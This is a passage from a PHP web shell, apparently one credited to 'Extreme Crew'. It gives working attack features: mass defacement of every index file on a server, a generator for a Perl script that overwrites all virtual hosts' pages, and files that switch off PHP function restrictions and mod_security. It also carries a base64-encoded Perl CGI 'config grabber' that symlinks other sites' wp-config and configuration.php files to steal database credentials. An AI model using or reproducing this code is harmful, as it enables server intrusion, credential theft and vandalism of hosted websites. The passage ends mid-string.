625 if($_POST['start']) {
626 if($_POST['tipe_sabun'] == 'mahal') {
627 echo "<div style='margin: 5px auto; padding: 5px'>";
628 sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
629 echo "</div>";
630 } elseif($_POST['tipe_sabun'] == 'murah') {
631 echo "<div style='margin: 5px auto; padding: 5px'>";
632 sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
633 echo "</div>";
634 }
635 } else {
636 echo "<center>";
637 echo "<form method='post'>
638 <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
639 <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
640 <font style='text-decoration: underline;'>Folder:</font><br>
641 <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
642 <font style='text-decoration: underline;'>Filename:</font><br>
643 <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
644 <font style='text-decoration: underline;'>Index File:</font><br>
645 <textarea name='script' style='width: 450px; height: 200px;'>Hacked by Extreme Crew</textarea><br>
646 <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
647 </form></center>";
648 }
649} elseif($_GET['do'] == 'mass_helper'){
650 echo "<center>";
651echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
652echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </b></help><br/>";
653echo "<help> <blink>=></blink><b> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </b></help><br><br/><br/>";
654echo "<form method=POST>
655<help title='the file you want to put in all sites'> Def page name : </help>
656 <input title='the file name you want to put in all sites' type=text name=index value=bie.htm> |
657<help title='your deface page's source code'>Def source code :</help>
658 <input title='your index source code' type='text' name='source' value='index.txt'><br><br>
659<help>List DocumentRoot from httpd.conf : </help><br>
660<input type=text name=dirs size=\"40\">
661<br><br>
662<help>List ServerName from httpd.conf : </help><br>
663<input type=text name=sites size=\"40\">
664<br><br>
665<center><input class='but' type=submit value='Generate ' name='go'></center>
666</form>
667<br/>";
668echo "</center>";
669if($_POST['go']){
670echo "<b></b>";
671$index = $_POST['index'];
672$source = $_POST['source'];
673$dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
674$sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
675
676// preparing perl script
677
678if($_POST['dirs']){
679
680
681 $perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
682 $perl_start = "#!/usr/bin/perl";
683 $perl_end = "print\"All Defaced !\";";
684 fwrite ($perl,$perl_start."\n\n"); // Write !!
685
686foreach($dirs as $dir){
687
688$result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
689fwrite ($perl, $result."\n");
690flush();
691}
692 echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
693 echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
694 fwrite ($perl, "\n".$perl_end);
695 fclose($perl);
696
697 }
698 // preparing sites list
699
700if($_POST['sites']){
701
702
703 $sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
704 $sitess_start = "http://";
705 $sitess_end = "/";
706 fwrite ($sitess,"");
707
708foreach($sites as $site){
709
710 $result2 = $sitess_start.@kill($site).$sitess_end.$index;
711 fwrite ($sitess, $result2."\n");
712 flush();
713}
714 echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
715 fwrite ($sitess,"");
716 fclose($sitess);
717
718}
719 }
720function kill($value){ return str_replace(array("\n","\r"),"",$value); }
721function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
722function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
723echo "<br />";
724echo "<div class='greetz'><center> Original script by <b>ReZK2LL</center><font></div>";
725
726} elseif($_GET['do'] == 'bypass'){
727 echo "<center>";
728 echo "<form method=post><input type=submit name=ini value='php.ini' /> <input type=submit name=htce value='.htaccess' /></form>";
729 if(isset($_POST['ini']))
730{
731 $file = fopen("php.ini","w");
732 echo fwrite($file,"disable_functions=none
733safe_mode = Off
734 ");
735 fclose($file);
736 echo "<a href='php.ini'>click here!</a>";
737} if(isset($_POST['htce']))
738{
739 $file = fopen(".htaccess","w");
740 echo fwrite($file,"<IfModule mod_security.c>
741SecFilterEngine Off
742SecFilterScanPOST Off
743</IfModule>
744 ");
745 fclose($file);
746 echo "htaccess successfully created!";
747}
748 echo"</center>";
749} elseif($_GET['do'] == 'convh')
750 {
751@mkdir('ecboss', 0755);
752@chdir('ecboss');
753 $elesem = ".htaccess";
754 $elakab = "$elesem";
755 $filhat = fopen ($elakab , 'w') or die ("Can't Write htaccess !");
756 $htcont = "Options FollowSymLinks MultiViews Indexes ExecCGI
757
758AddType application/x-httpd-cgi .ler
759
760AddHandler cgi-script .ler
761AddHandler cgi-script .ler";
762 fwrite ( $filhat , $htcont ) ;
763 fclose ($filhat);
764$config = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluCnByaW50ICJDb250ZW50LXR5cGU6IHRleHQvaHRtbFxuXG4iOwpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+CjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KCjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJlbi11cyIgLz4KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+Cjx0aXRsZT52SG9zdHMgQ29uZmlnIEdyYWJiZXI8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoubmV3U3R5bGUxIHsKIGZvbnQtZmFtaWx5OiB1YnVudHU7CiBmb250LXNpemU6IHgtbGFyZ2U7CiBjb2xvcjogd2hpdGU7CiBiYWNrZ3JvdW5kLWNvbG9yOiAjMTUxNTE1OwogdGV4dC1hbGlnbjogY2VudGVyOwp9Cjwvc3R5bGU+CjwvaGVhZD4KJzsKCgpwcmludCAnCjxib2R5IGNsYXNzPSJuZXdTdHlsZTEiPgo8cD4uOiBDb2RlZCBieSBGYWxsYWcgR2Fzc3JpbmkgfCBSZWMwZGVkIGJ5IENvdXJhZ2V1eDwvcD4nOwpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOwpmb3JlYWNoKHNvcnQgcmVhZGRpciAkZGlyKSB7CiAgICBteSAkaXNEaXIgPSAwOwogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsKJHNpdGVzcyA9ICRfOwoKCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLW9zLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywkc2l0ZXNzLictb3Njb21tZXJjZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1vc2NvbW1lcmNlcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcHBpbmcvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atc2hvcHBpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zYWxlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLW1lbWJlcnMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9mb3J1bXMvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdQLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1iZXRhLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtcHJlc3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtV29yZHByZXNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJldGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZ3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1wcm90YWwudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1zaXRlLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtbWFpbi50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Rlc3Qvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLXRlc3QudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvby9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvby50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW1haW4udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1ob21lLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12YjF+Y29uZmlnLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWluY2x1ZGVzLXZiLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocDIudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS13aG1jcy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY3BhbmVsLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RpbmcudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdWJtaXR0aWNrZXQucGhwJywkc2l0ZXNzLictd2htY3MyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudGVzLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmcudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teXNob3AvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXlzaG9wLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLVpDc2hvcC50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IApzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyAKc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7CnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcnRpY2xlL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1Od2FoeS50eHQnKTsgCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOwpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQ